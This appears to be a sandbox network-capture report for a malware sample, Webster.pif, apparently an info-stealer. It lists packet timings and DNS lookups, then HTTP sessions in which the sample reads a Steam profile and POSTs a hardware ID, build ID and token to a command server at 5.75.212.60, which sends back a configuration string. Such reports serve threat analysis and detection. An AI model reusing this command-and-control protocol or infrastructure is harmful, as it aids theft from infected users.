                                                                                Jul 26, 2024 17:54:53.823230028 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.828305960 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.828320026 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.828385115 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.828399897 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.828449965 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.830508947 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.830523968 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.830584049 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.830599070 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.830646038 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.832453966 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.832468033 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.832532883 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.832545996 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.832592010 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.834460974 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.834476948 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.834569931 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.834569931 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.834587097 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.834630013 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.839041948 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.839057922 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.905857086 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.905857086 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.907128096 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.907151937 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.907196999 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.907222033 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.907246113 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.907265902 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.907993078 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.908010006 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.908070087 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.908083916 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.908133984 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911169052 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911186934 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911264896 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911278963 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911319017 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911329985 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911341906 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911387920 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911406994 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911457062 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911468029 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911533117 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911533117 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911582947 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911602020 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911664009 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.911679029 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.911730051 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.912460089 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.912492990 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.912555933 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.912570953 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.912620068 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.913479090 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.913507938 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.913554907 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.913568974 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.913600922 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.913619995 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.915694952 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.915714979 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.915788889 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.915802002 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.915859938 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.915924072 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.915941954 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.915997982 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.916012049 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.916065931 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.917659044 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.917678118 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.917762995 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.917777061 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.917835951 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.918617010 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.918639898 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.918724060 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.918737888 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.918797016 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.920819044 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.920838118 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.920931101 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.920944929 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.920989990 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.921000957 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.921010971 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.921020985 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.921053886 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.921130896 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.921911955 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.921926975 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.922003984 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.922018051 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.922069073 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.922954082 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.922971010 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.923032999 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.923047066 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.923096895 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.924273968 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.924298048 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.924369097 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.924382925 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.924433947 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.925631046 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.925646067 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.925702095 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.925714970 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.925740004 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.925781965 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.926475048 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.926491022 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.926563025 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.926575899 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.926625013 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.927180052 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.927202940 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.927263021 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.927275896 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.927326918 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.929629087 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.929642916 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.929703951 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.929717064 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.929766893 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.930610895 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.930624962 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.930676937 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.930690050 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.930715084 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.930735111 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.931658030 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.931673050 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.931730986 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.931749105 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.931772947 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.931790113 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.932507038 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.932523012 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.932569027 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.932586908 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.932611942 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.932646036 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.933526039 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.933541059 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.933583975 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.933597088 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.933620930 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.933636904 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.935666084 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.935682058 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.935734987 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.935754061 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.935777903 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.935796976 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.939788103 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.939805031 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.939873934 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.939888954 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.939939022 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.940262079 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.940280914 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.940320015 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.940327883 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.940337896 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.940340996 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.940392971 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.940408945 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.940423012 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.940454006 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.940469980 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.941354036 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.941369057 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.941414118 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.941431999 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.941454887 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.941494942 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.942395926 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.942413092 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.942461967 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.942487955 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.942512035 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.942532063 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.958843946 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.958859921 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.958941936 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.958959103 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.959007978 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.961543083 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.961556911 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.961623907 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.961637974 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.961684942 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.962711096 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.962724924 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.962778091 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:53.962791920 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:53.962835073 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:54.044992924 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:54.045032024 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:54.045175076 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:54.045203924 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:54.045257092 CEST64183443192.168.2.65.75.212.60
                                                                                Jul 26, 2024 17:54:54.051954985 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:54.051971912 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:54.052017927 CEST443641835.75.212.60192.168.2.6
                                                                                Jul 26, 2024 17:54:54.052058935 CEST443641835.75.212.60192.168.2.6
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jul 26, 2024 17:53:06.393099070 CEST | 53933 | 53 | 192.168.2.6 | 1.1.1.1 |
| Jul 26, 2024 17:53:06.403953075 CEST | 53 | 53933 | 1.1.1.1 | 192.168.2.6 |
| Jul 26, 2024 17:53:37.049578905 CEST | 53 | 65149 | 162.159.36.2 | 192.168.2.6 |
| Jul 26, 2024 17:53:37.534704924 CEST | 63958 | 53 | 192.168.2.6 | 1.1.1.1 |
| Jul 26, 2024 17:53:37.546936035 CEST | 53 | 63958 | 1.1.1.1 | 192.168.2.6 |
| Jul 26, 2024 17:53:39.512348890 CEST | 50365 | 53 | 192.168.2.6 | 1.1.1.1 |
| Jul 26, 2024 17:53:39.535487890 CEST | 53 | 50365 | 1.1.1.1 | 192.168.2.6 |
| Jul 26, 2024 17:54:22.492189884 CEST | 58691 | 53 | 192.168.2.6 | 1.1.1.1 |
| Jul 26, 2024 17:54:22.524728060 CEST | 53 | 58691 | 1.1.1.1 | 192.168.2.6 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jul 26, 2024 17:53:06.393099070 CEST | 192.168.2.6 | 1.1.1.1 | 0x9dde | Standard query (0) | FGQNrbtYCvA.FGQNrbtYCvA | A (IP address) | IN (0x0001) | false |
| Jul 26, 2024 17:53:37.534704924 CEST | 192.168.2.6 | 1.1.1.1 | 0xf98e | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Jul 26, 2024 17:53:39.512348890 CEST | 192.168.2.6 | 1.1.1.1 | 0x5c98 | Standard query (0) | 86.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false |
| Jul 26, 2024 17:54:22.492189884 CEST | 192.168.2.6 | 1.1.1.1 | 0x4da0 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jul 26, 2024 17:53:06.403953075 CEST | 1.1.1.1 | 192.168.2.6 | 0x9dde | Name error (3) | FGQNrbtYCvA.FGQNrbtYCvA | none | none | A (IP address) | IN (0x0001) | false |
| Jul 26, 2024 17:53:37.546936035 CEST | 1.1.1.1 | 192.168.2.6 | 0xf98e | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false |
| Jul 26, 2024 17:53:39.535487890 CEST | 1.1.1.1 | 192.168.2.6 | 0x5c98 | Name error (3) | 86.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false |
| Jul 26, 2024 17:54:22.524728060 CEST | 1.1.1.1 | 192.168.2.6 | 0x4da0 | No error (0) | steamcommunity.com | | 23.197.127.21 | A (IP address) | IN (0x0001) | false |

                                                                                • steamcommunity.com
                                                                                • 5.75.212.60

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 64167 | 23.197.127.21 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif |

Timestamp: 2024-07-26 15:54:23 UTC, Bytes transferred: 119, Direction: OUT, Data:
GET /profiles/76561199747278259 HTTP/1.1
                                                                                Host: steamcommunity.com
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
Timestamp: 2024-07-26 15:54:23 UTC, Bytes transferred: 1870, Direction: IN, Data:
HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                Cache-Control: no-cache
                                                                                Date: Fri, 26 Jul 2024 15:54:23 GMT
                                                                                Content-Length: 34725
                                                                                Connection: close
                                                                                Set-Cookie: sessionid=a8463345d80d003bbc0ed922; Path=/; Secure; SameSite=None
                                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-07-26 15:54:23 UTC | 14514 | IN
                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-07-26 15:54:23 UTC | 10062 | IN
                                                                                Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-07-26 15:54:24 UTC | 10149 | IN
                                                                                Data Ascii: kamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 64168 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:24 UTC | 230 | OUT | GET / HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
2024-07-26 15:54:25 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
2024-07-26 15:54:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 64169 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:26 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 279
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
2024-07-26 15:54:26 UTC | 279 | OUT
                                                                                Data Ascii: ------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="hwid"241F38130C801128056648-a33c7340-61ca-11ee-8c18-806e6f6e6963------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------
2024-07-26 15:54:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:27 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
2024-07-26 15:54:27 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 34 39 36 64 63 35 37 62 31 37 64 36 31 34 31 31 62 37 62 66 34 63 63 64 37 32 31 35 37 61 37 39 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 3a1|1|1|1|496dc57b17d61411b7bf4ccd72157a79|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 64170 | 5.75.212.60 | 443 | 5740 | C:\Users\user\AppData\Local\Temp\229536\Webster.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 15:54:28 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                Host: 5.75.212.60
                                                                                Content-Length: 331
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
2024-07-26 15:54:28 UTC | 331 | OUT
                                                                                Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="token"496dc57b17d61411b7bf4ccd72157a79------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------KFIJJEGHDAEBGCAKJKFHCont
2024-07-26 15:54:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Fri, 26 Jul 2024 15:54:28 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
2024-07-26 15:54:29 UTC | 1564 | IN
